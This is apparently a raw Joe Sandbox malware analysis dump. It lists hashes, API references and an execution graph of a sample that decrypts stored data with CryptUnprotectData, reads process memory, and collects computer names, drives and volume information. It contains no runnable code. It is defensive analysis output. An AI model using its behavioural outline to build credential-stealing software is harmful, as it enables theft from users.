                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                • Opcode ID: aeb026a7d296a4fa981301e693c9e87122c71079e3c21639fcbda75acb793160
                                                                                                                                                                                                                • Instruction ID: 816ae187853155cc04b3144243f2fdb8168ebddb5b789e03e1369469cba53999
                                                                                                                                                                                                                • Opcode Fuzzy Hash: aeb026a7d296a4fa981301e693c9e87122c71079e3c21639fcbda75acb793160
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD111550A4921386F968B7715A521BED1825F4A335FD84F36ED3E0A2E2DE2CB4834A71
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,COMSPEC,00007FF7D77F5BBB,?,?,00000000,00007FF7D77F5E9A), ref: 00007FF7D77FA1AD
                                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,COMSPEC,00007FF7D77F5BBB,?,?,00000000,00007FF7D77F5E9A), ref: 00007FF7D77FA21F
                                                                                                                                                                                                                  • Part of subcall function 00007FF7D77FB070: HeapAlloc.KERNEL32(?,?,FFFFFFFD,00007FF7D77F999B), ref: 00007FF7D77FB0AE
                                                                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,COMSPEC,00007FF7D77F5BBB,?,?,00000000,00007FF7D77F5E9A), ref: 00007FF7D77FA27E
                                                                                                                                                                                                                  • Part of subcall function 00007FF7D77F71DC: HeapFree.KERNEL32(?,?,22E8F98BF28B4820,00007FF7D77FAF52,?,?,?,00007FF7D77FAF8F,?,?,00000000,00007FF7D77FB4B5,?,?,00007FF7D77F54BB,00007FF7D77FB3E7), ref: 00007FF7D77F71F2
                                                                                                                                                                                                                  • Part of subcall function 00007FF7D77F71DC: GetLastError.KERNEL32(?,?,22E8F98BF28B4820,00007FF7D77FAF52,?,?,?,00007FF7D77FAF8F,?,?,00000000,00007FF7D77FB4B5,?,?,00007FF7D77F54BB,00007FF7D77FB3E7), ref: 00007FF7D77F71FC
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: EnvironmentFreeStrings$Heap$AllocErrorLast
                                                                                                                                                                                                                • String ID: COMSPEC
                                                                                                                                                                                                                • API String ID: 3331406755-1631433037
                                                                                                                                                                                                                • Opcode ID: 5404f3279ac07d541c68fe5249167e5e9fee70a936e98de270877ffd1baa10d2
                                                                                                                                                                                                                • Instruction ID: d41636801c4cb9f3ce112d934ca67d10fbd3600ceb1c9a109eea03be66ffcff5
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5404f3279ac07d541c68fe5249167e5e9fee70a936e98de270877ffd1baa10d2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B931A621E18B4185E724AF25694007EF6A4BBC9BE4FC54936EE4E53BD5DF3CE4424214
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2718003287-0
                                                                                                                                                                                                                • Opcode ID: 062aaaa8b83d1f6d98b11906aad4461370a7e96d943de9789ace639ddc18cee1
                                                                                                                                                                                                                • Instruction ID: df3ad35f7eca5587307dcd918a3eee50c257f1c8fd1f599e51be488accbca003
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 062aaaa8b83d1f6d98b11906aad4461370a7e96d943de9789ace639ddc18cee1
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B1D1D032B18A8189E710DF65D5402ACB7B2FB487E8F90463ACE5D97B99DE78E447C310
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: EncodePointer
                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                • Opcode ID: 4cc05a13dbd691478e9753dbc6ace1f93ecb855416882bdef743b22574f75cda
                                                                                                                                                                                                                • Instruction ID: 04ac59daa45ec119f9696eface9ad6f0af16be53a506923b20a0a755c220ae95
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4cc05a13dbd691478e9753dbc6ace1f93ecb855416882bdef743b22574f75cda
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB619F72908BC581D760AB15E5803AEF7A0FB89BA4F844626EF8C03B55DF3CD091CB10
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                • API String ID: 442123175-4171548499
                                                                                                                                                                                                                • Opcode ID: 701151f88204e3d65cc407c3b76db480a1853325d01e99f5eff3c3a30a45588c
                                                                                                                                                                                                                • Instruction ID: fec83bab4fc547159c6e084a14731d641a7902991132e81ecaa9a0a43fa81352
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 701151f88204e3d65cc407c3b76db480a1853325d01e99f5eff3c3a30a45588c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B741B422A18B8185DB20EF25E5447ADE7A0FB88794FC04536EE8E87798DF7CD542C750
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000000.00000002.913058499.00007FF7D77F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D77F0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000000.00000002.913031778.00007FF7D77F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913099146.00007FF7D7803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913130770.00007FF7D780D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000000.00000002.913156994.00007FF7D780F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff7d77f0000_7IXl1M9JGV.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                • Opcode ID: e281b008d8b40c43a578bcedb96368d40f4b3dcf69cf36e96c47b0eb34efe405
                                                                                                                                                                                                                • Instruction ID: 6b4a833b595e815fe221554ad1fa33c5ce46c28e4b30ec0a732e4d6c63a4c082
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e281b008d8b40c43a578bcedb96368d40f4b3dcf69cf36e96c47b0eb34efe405
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16115B32609B8182EB20AB15F50026DFBE0FB88B94F988635EF8D17B54DF3CC5528B00

                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                Execution Coverage:9.6%
                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                Signature Coverage:55%
                                                                                                                                                                                                                Total number of Nodes:400
                                                                                                                                                                                                                Total number of Limit Nodes:16
                                                                                                                                                                                                                execution_graph 18427 40d400 18430 40d406 18427->18430 18428 40d478 ExitProcess 18429 40d46e 18429->18428 18430->18428 18430->18429 18430->18430 18431 40d44a GetCurrentThreadId GetForegroundWindow 18430->18431 18432 40d45a GetCurrentProcessId 18431->18432 18433 40d460 18431->18433 18432->18433 18433->18429 18435 410bd0 CoInitializeEx 18433->18435 18436 42b503 18437 42b470 18436->18437 18437->18436 18440 42b65e 18437->18440 18443 43b600 LdrInitializeThunk 18437->18443 18439 42b7ee 18440->18439 18442 43b600 LdrInitializeThunk 18440->18442 18442->18439 18443->18440 18449 43c0c2 18450 43c0e0 18449->18450 18450->18450 18451 43c13e 18450->18451 18453 43b600 LdrInitializeThunk 18450->18453 18453->18451 18454 4247c0 18455 4247e0 18454->18455 18457 42482e 18455->18457 18460 43b600 LdrInitializeThunk 18455->18460 18459 424948 18457->18459 18461 43b600 LdrInitializeThunk 18457->18461 18460->18457 18461->18459 18462 435700 18464 435720 18462->18464 18463 43588e 18466 4357a8 18464->18466 18471 43b600 LdrInitializeThunk 18464->18471 18466->18463 18468 43582e 18466->18468 18470 43b600 LdrInitializeThunk 18466->18470 18468->18463 18472 43b600 LdrInitializeThunk 18468->18472 18470->18468 18471->18466 18472->18463 18473 418602 18474 418670 18473->18474 18474->18474 18475 41868c FindWindowExW 18474->18475 18476 4185f0 18475->18476 18477 4186a8 18475->18477 18477->18476 18478 418773 GetWindowThreadProcessId 18477->18478 18479 41876a GetWindowThreadProcessId 18477->18479 18479->18478 18480 417502 18489 41750e 18480->18489 18482 417637 ExitProcess 18490 41764f 18482->18490 18483 4177ac ExitProcess 18483->18490 18484 417619 18486 4178f6 18520 438700 18486->18520 18489->18482 18489->18483 18489->18484 18489->18486 18491 41a360 18489->18491 18519 43b600 LdrInitializeThunk 18489->18519 18490->18483 18492 41a3b0 18491->18492 18492->18492 18524 41c920 18492->18524 18494 438700 LdrInitializeThunk 18496 41a97b 18494->18496 18495 41a45c 18503 41a970 18495->18503 18536 439d20 18495->18536 18496->18489 18498 439d20 2 API calls 18500 41aa1d 18498->18500 18500->18503 18544 439140 18500->18544 18503->18494 18504 41aae8 18504->18503 18505 41af3a 18504->18505 18554 438fc0 18504->18554 18573 43b600 LdrInitializeThunk 18504->18573 18506 438fc0 2 API calls 18505->18506 18510 41b034 18505->18510 18507 41b012 18506->18507 18507->18510 18561 41d480 18507->18561 18511 438fc0 2 API calls 18510->18511 18517 41b1ad 18510->18517 18512 41b132 18511->18512 18513 438fc0 2 API calls 18512->18513 18512->18517 18514 41b165 18513->18514 18515 438fc0 2 API calls 18514->18515 18514->18517 18516 41b196 18515->18516 18516->18517 18518 438fc0 2 API calls 18516->18518 18517->18517 18518->18517 18519->18489 18521 41793a 18520->18521 18522 43870a 18520->18522 18522->18521 18671 43b600 LdrInitializeThunk 18522->18671 18525 41ca40 18524->18525 18527 41cb2e 18525->18527 18574 43b600 LdrInitializeThunk 18525->18574 18528 41cc20 18527->18528 18535 41cc1e 18527->18535 18575 43b600 LdrInitializeThunk 18527->18575 18528->18495 18531 43b600 LdrInitializeThunk 18531->18535 18532 438700 LdrInitializeThunk 18532->18535 18534 438fc0 NtWow64ReadVirtualMemory64 LdrInitializeThunk 18534->18535 18535->18528 18535->18531 18535->18532 18535->18534 18576 438580 18535->18576 18580 438a90 18535->18580 18538 439d60 18536->18538 18537 439dbf 18539 438fc0 2 API calls 18537->18539 18542 41a8b4 18537->18542 18538->18537 18586 43b600 LdrInitializeThunk 18538->18586 18541 439e0e 18539->18541 18541->18541 18541->18542 18587 43b600 LdrInitializeThunk 18541->18587 18542->18498 18542->18503 18546 439190 18544->18546 18545 439878 18545->18504 18552 4391ee 18546->18552 18588 43b600 LdrInitializeThunk 18546->18588 18549 4397e4 18549->18545 18598 43b600 LdrInitializeThunk 18549->18598 18551 438fc0 2 API calls 18551->18552 18552->18545 18552->18549 18552->18551 18553 43b600 LdrInitializeThunk 18552->18553 18589 438ce0 18552->18589 18553->18552 18560 438fd5 18554->18560 18555 439060 18556 439073 NtWow64ReadVirtualMemory64 18555->18556 18557 43910e 18556->18557 18557->18504 18558 438fe5 18558->18557 18659 43b600 LdrInitializeThunk 18558->18659 18560->18555 18560->18558 18562 41d499 18561->18562 18660 41d570 18562->18660 18564 41d4bb 18565 438fc0 2 API calls 18564->18565 18570 41d4fe 18564->18570 18567 41d4e8 18565->18567 18566 438fc0 2 API calls 18568 41d523 18566->18568 18569 41d480 2 API calls 18567->18569 18567->18570 18571 41d480 2 API calls 18568->18571 18572 41d539 18568->18572 18569->18570 18570->18566 18570->18572 18571->18572 18572->18510 18573->18504 18574->18527 18575->18535 18577 43864e 18576->18577 18578 438591 18576->18578 18577->18535 18578->18577 18584 43b600 LdrInitializeThunk 18578->18584 18581 438aac 18580->18581 18581->18581 18582 438bb2 18581->18582 18585 43b600 LdrInitializeThunk 18581->18585 18582->18535 18584->18577 18585->18582 18586->18537 18587->18542 18588->18552 18594 438cf8 18589->18594 18590 438d7b 18599 43d770 18590->18599 18594->18590 18596 438cfd 18594->18596 18595 438e69 18595->18552 18596->18595 18611 43b600 LdrInitializeThunk 18596->18611 18598->18545 18600 43d797 18599->18600 18601 43d78d 18599->18601 18603 438dfd 18600->18603 18604 43d840 LdrInitializeThunk 18600->18604 18612 43d340 18601->18612 18605 43d840 18603->18605 18604->18603 18607 43d8b3 18605->18607 18606 43e14e 18606->18595 18607->18606 18609 43de2e 18607->18609 18657 43b600 LdrInitializeThunk 18607->18657 18609->18606 18658 43b600 LdrInitializeThunk 18609->18658 18611->18595 18613 43d360 18612->18613 18614 43d3eb 18612->18614 18630 43cf00 18613->18630 18625 43d4ff 18614->18625 18644 43ccb0 18614->18644 18618 43ccb0 2 API calls 18619 43d44b 18618->18619 18620 43ccb0 2 API calls 18619->18620 18619->18625 18621 43d48f 18620->18621 18622 43ccb0 2 API calls 18621->18622 18621->18625 18623 43d4e9 18622->18623 18624 43ccb0 2 API calls 18623->18624 18623->18625 18626 43d544 18624->18626 18625->18600 18626->18625 18627 43ccb0 2 API calls 18626->18627 18629 43d5a0 18627->18629 18628 43ccb0 2 API calls 18628->18629 18629->18625 18629->18628 18631 43cf30 18630->18631 18631->18631 18633 43cfce 18631->18633 18652 43b600 LdrInitializeThunk 18631->18652 18637 43d0ae 18633->18637 18643 43d2d6 18633->18643 18653 43b600 LdrInitializeThunk 18633->18653 18634 43d17e 18636 43ccb0 2 API calls 18634->18636 18634->18643 18638 43d1bc 18636->18638 18637->18634 18654 43b600 LdrInitializeThunk 18637->18654 18640 43ccb0 2 API calls 18638->18640 18638->18643 18642 43d1e1 18640->18642 18641 43ccb0 LdrInitializeThunk NtWow64ReadVirtualMemory64 18641->18642 18642->18641 18642->18643 18643->18614 18645 43cce0 18644->18645 18647 43cd20 18644->18647 18645->18618 18645->18625 18646 43cdbe 18646->18645 18649 43ce10 NtWow64ReadVirtualMemory64 18646->18649 18647->18646 18655 43b600 LdrInitializeThunk 18647->18655 18650 43ce40 18649->18650 18650->18645 18656 43b600 LdrInitializeThunk 18650->18656 18652->18633 18653->18637 18654->18634 18655->18646 18656->18645 18657->18609 18658->18606 18659->18557 18661 438fc0 2 API calls 18660->18661 18663 41d5a7 18661->18663 18662 41d630 18662->18564 18663->18662 18664 438fc0 2 API calls 18663->18664 18665 41d615 18663->18665 18664->18665 18666 438fc0 2 API calls 18665->18666 18667 41d6e1 18665->18667 18666->18667 18668 438fc0 2 API calls 18667->18668 18669 41d79b 18667->18669 18668->18669 18669->18662 18670 438fc0 2 API calls 18669->18670 18670->18662 18671->18521 18672 418782 18679 4187b0 18672->18679 18673 418866 FindWindowExW 18674 4188c0 IsWindowEnabled 18673->18674 18675 418894 GetWindowThreadProcessId 18673->18675 18676 4185b6 18673->18676 18677 4188db IsWindowVisible 18673->18677 18678 4188bd IsWindowEnabled 18673->18678 18673->18679 18674->18679 18675->18674 18675->18676 18675->18677 18675->18678 18675->18679 18677->18676 18677->18679 18678->18674 18679->18673 18679->18674 18679->18675 18679->18676 18679->18677 18679->18678 18685 410c05 CoInitializeSecurity 18686 411204 18687 411230 18686->18687 18688 411309 ExitProcess 18687->18688 18699 421a80 18688->18699 18690 411322 18691 41132c ExitProcess 18690->18691 18692 411342 18691->18692 18693 41134c ExitProcess 18692->18693 18712 4222a0 18693->18712 18700 421ae0 18699->18700 18700->18700 18713 43f260 18700->18713 18702 421c71 18703 421e3b 18702->18703 18705 421df8 18702->18705 18707 421c80 18702->18707 18709 421de7 18702->18709 18723 41fdf0 18703->18723 18705->18690 18706 421dd1 GetLogicalDrives 18708 43f260 LdrInitializeThunk 18706->18708 18707->18706 18707->18707 18708->18709 18709->18705 18717 41dad0 18709->18717 18711 422268 18714 43f280 18713->18714 18715 43f3ce 18714->18715 18732 43b600 LdrInitializeThunk 18714->18732 18715->18702 18718 41dae0 18717->18718 18719 43f260 LdrInitializeThunk 18718->18719 18720 41db39 18719->18720 18721 41fdf0 LdrInitializeThunk 18720->18721 18722 41db59 18720->18722 18721->18722 18722->18711 18733 43f0b0 18723->18733 18725 420692 18725->18709 18726 41fe30 18726->18725 18730 41ff25 18726->18730 18737 43b600 LdrInitializeThunk 18726->18737 18728 4205cd 18728->18725 18739 43b600 LdrInitializeThunk 18728->18739 18730->18728 18738 43b600 LdrInitializeThunk 18730->18738 18732->18715 18734 43f0d0 18733->18734 18734->18734 18735 43f20e 18734->18735 18740 43b600 LdrInitializeThunk 18734->18740 18735->18726 18737->18726 18738->18730 18739->18728 18740->18735 18741 43c1c5 18744 43c1dd 18741->18744 18743 43c264 18745 43b600 LdrInitializeThunk 18744->18745 18745->18743 18746 43c3ce GetForegroundWindow 18750 43ee80 18746->18750 18748 43c3da GetForegroundWindow 18749 43c3e9 18748->18749 18751 43ee90 18750->18751 18751->18748 18752 417dce 18753 417df0 18752->18753 18755 417e4d 18753->18755 18763 43b600 LdrInitializeThunk 18753->18763 18758 417ee0 18755->18758 18762 43b600 LdrInitializeThunk 18755->18762 18757 417f80 18760 418020 18757->18760 18765 43b600 LdrInitializeThunk 18757->18765 18758->18757 18764 43b600 LdrInitializeThunk 18758->18764 18762->18758 18763->18755 18764->18757 18765->18760 18766 438212 RtlAllocateHeap 18768 43b550 18769 43b570 18768->18769 18771 43b5d3 18768->18771 18769->18769 18770 43b5be RtlReAllocateHeap 18769->18770 18769->18771 18770->18771 18772 43f9d0 18773 43fa00 18772->18773 18775 43fa6e 18773->18775 18778 43b600 LdrInitializeThunk 18773->18778 18777 43fb7e 18775->18777 18779 43b600 LdrInitializeThunk 18775->18779 18778->18775 18779->18777 18780 43609f 18781 43f0b0 LdrInitializeThunk 18780->18781 18790 4360af 18781->18790 18782 4361d6 18795 4387c0 18782->18795 18783 438700 LdrInitializeThunk 18785 43612e 18783->18785 18785->18782 18785->18783 18786 4360c0 18785->18786 18787 438580 LdrInitializeThunk 18785->18787 18788 43628e 18785->18788 18789 43621f 18785->18789 18787->18785 18788->18788 18805 43b600 LdrInitializeThunk 18788->18805 18789->18788 18804 43b600 LdrInitializeThunk 18789->18804 18790->18782 18790->18785 18790->18786 18790->18788 18790->18789 18803 43b600 LdrInitializeThunk 18790->18803 18794 436337 18796 438857 18795->18796 18797 4387d6 18795->18797 18796->18786 18797->18796 18799 438852 18797->18799 18806 43b600 LdrInitializeThunk 18797->18806 18800 43899e 18799->18800 18807 43b600 LdrInitializeThunk 18799->18807 18800->18796 18808 43b600 LdrInitializeThunk 18800->18808 18803->18785 18804->18788 18805->18794 18806->18799 18807->18800 18808->18796 18809 438266 18810 438274 RtlFreeHeap 18809->18810 18811 438324 18809->18811 18810->18811 18813 42cbe4 CoSetProxyBlanket 18814 418d6f 18816 418d80 18814->18816 18815 418f05 CryptUnprotectData 18817 418f3a 18815->18817 18816->18815 18819 41994c 18817->18819 18821 436350 18817->18821 18820 436350 LdrInitializeThunk 18819->18820 18820->18819 18830 43f880 18821->18830 18825 436396 18827 4363d8 18825->18827 18840 440330 18825->18840 18828 43643e 18827->18828 18846 43b600 LdrInitializeThunk 18827->18846 18828->18819 18832 43f8a0 18830->18832 18831 43636c 18831->18828 18834 43fcc0 18831->18834 18832->18831 18847 43b600 LdrInitializeThunk 18832->18847 18835 43fcf0 18834->18835 18837 43fd5e 18835->18837 18848 43b600 LdrInitializeThunk 18835->18848 18839 43fe3e 18837->18839 18849 43b600 LdrInitializeThunk 18837->18849 18839->18825 18841 44033f 18840->18841 18843 44041e 18841->18843 18850 43b600 LdrInitializeThunk 18841->18850 18845 44058f 18843->18845 18851 43b600 LdrInitializeThunk 18843->18851 18845->18827 18846->18828 18847->18831 18848->18837 18849->18839 18850->18843 18851->18845 18852 418b31 18854 418b36 18852->18854 18853 418d16 18854->18853 18855 43f260 LdrInitializeThunk 18854->18855 18857 418c94 18855->18857 18857->18853 18857->18857 18858 41b840 18857->18858 18859 41b865 18858->18859 18870 417000 18859->18870 18861 41b97d 18862 417000 LdrInitializeThunk 18861->18862 18863 41ba13 18862->18863 18864 417000 LdrInitializeThunk 18863->18864 18865 41bafe 18864->18865 18866 417000 LdrInitializeThunk 18865->18866 18868 41bb5d 18866->18868 18867 417000 LdrInitializeThunk 18867->18868 18868->18867 18869 41bd3f 18868->18869 18869->18853 18871 417020 18870->18871 18871->18871 18872 43f0b0 LdrInitializeThunk 18871->18872 18873 4170ec 18872->18873 18875 417112 18873->18875 18877 417141 18873->18877 18879 4170fb 18873->18879 18886 43f420 18873->18886 18875->18877 18875->18879 18880 43f510 18875->18880 18877->18879 18890 43b600 LdrInitializeThunk 18877->18890 18879->18861 18879->18879 18881 43f540 18880->18881 18884 43f5af 18881->18884 18891 43b600 LdrInitializeThunk 18881->18891 18883 43f67e 18883->18877 18884->18883 18892 43b600 LdrInitializeThunk 18884->18892 18888 43f450 18886->18888 18887 43f4be 18887->18875 18888->18887 18893 43b600 LdrInitializeThunk 18888->18893 18890->18879 18891->18884 18892->18883 18893->18887 18894 41f730 18895 41f73e 18894->18895 18899 41f780 18894->18899 18900 41f840 18895->18900 18901 41f850 18900->18901 18901->18901 18902 43f260 LdrInitializeThunk 18901->18902 18903 41f94f 18902->18903 18920 43bd36 18921 43bd39 18920->18921 18922 43be2e 18921->18922 18924 43b600 LdrInitializeThunk 18921->18924 18924->18922 18925 410c37 18928 4358f0 18925->18928 18927 410c41 18930 435960 CoCreateInstance 18928->18930 18931 435f82 18930->18931 18932 435a3a SysAllocString 18930->18932 18933 435f9a GetVolumeInformationW 18931->18933 18935 435acd 18932->18935 18938 435fb5 18933->18938 18936 435ad9 CoSetProxyBlanket 18935->18936 18937 435f6e SysFreeString 18935->18937 18939 435f64 18936->18939 18940 435af9 SysAllocString 18936->18940 18937->18931 18938->18927 18939->18937 18942 435be0 18940->18942 18942->18942 18943 435c0e SysAllocString 18942->18943 18945 435c39 18943->18945 18944 435f4e SysFreeString SysFreeString 18944->18939 18945->18944 18946 435f44 18945->18946 18947 435c84 VariantInit 18945->18947 18946->18944 18949 435ce0 18947->18949 18948 435f2c VariantClear 18948->18946 18949->18948 18950 429c7c 18951 429c9b 18950->18951 18952 429d5d GetComputerNameExA 18951->18952 18954 429db0 18952->18954 18953 429e0b GetComputerNameExA 18955 429e80 18953->18955 18954->18953 18954->18954 18956 43b9fd 18957 43ba30 18956->18957 18958 43ba8e 18957->18958 18962 43b600 LdrInitializeThunk 18957->18962 18961 43b600 LdrInitializeThunk 18958->18961 18961->18958 18962->18958

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 0 4358f0-435956 1 435960-4359bf 0->1 1->1 2 4359c1-4359dc 1->2 4 4359e6-435a34 CoCreateInstance 2->4 5 4359de 2->5 6 435f82-435faf call 43e6d0 GetVolumeInformationW 4->6 7 435a3a-435a7f 4->7 5->4 12 436063-43606a 6->12 13 435fb5-435fbf 6->13 9 435a80-435a9e 7->9 9->9 11 435aa0-435ad3 SysAllocString 9->11 18 435ad9-435af3 CoSetProxyBlanket 11->18 19 435f6e-435f7e SysFreeString 11->19 14 435fdd-435fe4 13->14 16 435fe6-435fed 14->16 17 435ffd-43603d call 41d220 14->17 16->17 20 435fef-435ffb 16->20 27 436040-436048 17->27 22 435f64-435f6a 18->22 23 435af9-435b19 18->23 19->6 20->17 22->19 24 435b20-435b60 23->24 24->24 26 435b62-435bde SysAllocString 24->26 28 435be0-435c0c 26->28 27->27 29 43604a-43604c 27->29 28->28 30 435c0e-435c42 SysAllocString 28->30 31 435fd0-435fd7 29->31 32 43604e-43605e call 40ce10 29->32 36 435c48-435c6a 30->36 37 435f4e-435f60 SysFreeString * 2 30->37 31->12 31->14 32->31 39 435c70-435c73 36->39 40 435f44-435f4a 36->40 37->22 39->40 41 435c79-435c7e 39->41 40->37 41->40 42 435c84-435cdf VariantInit 41->42 43 435ce0-435d06 42->43 43->43 44 435d08-435d19 43->44 45 435d1d-435d23 44->45 46 435d29-435d32 45->46 47 435f2c-435f40 VariantClear 45->47 46->47 48 435d38-435d45 46->48 47->40 49 435d47-435d4e 48->49 50 435d7d-435d7f 48->50 51 435d5c-435d60 49->51 52 435d81-435dab call 40cc80 50->52 53 435d62-435d6b 51->53 54 435d50 51->54 61 435db1-435dbf 52->61 62 435ede-435ef3 52->62 57 435d72-435d76 53->57 58 435d6d-435d70 53->58 56 435d51-435d5a 54->56 56->51 56->52 57->56 60 435d78-435d7b 57->60 58->56 60->56 61->62 65 435dc5-435dc9 61->65 63 435ef5 62->63 64 435efa-435f02 62->64 63->64 67 435f04 64->67 68 435f09-435f29 call 40ccb0 call 40cc90 64->68 66 435dd0-435dda 65->66 69 435df0-435df6 66->69 70 435ddc-435de1 66->70 67->68 68->47 73 435e15-435e27 69->73 74 435df8-435dfb 69->74 72 435e80-435e84 70->72 80 435e86-435e8e 72->80 77 435e9a-435ea3 73->77 78 435e29-435e2c 73->78 74->73 76 435dfd-435e13 74->76 76->72 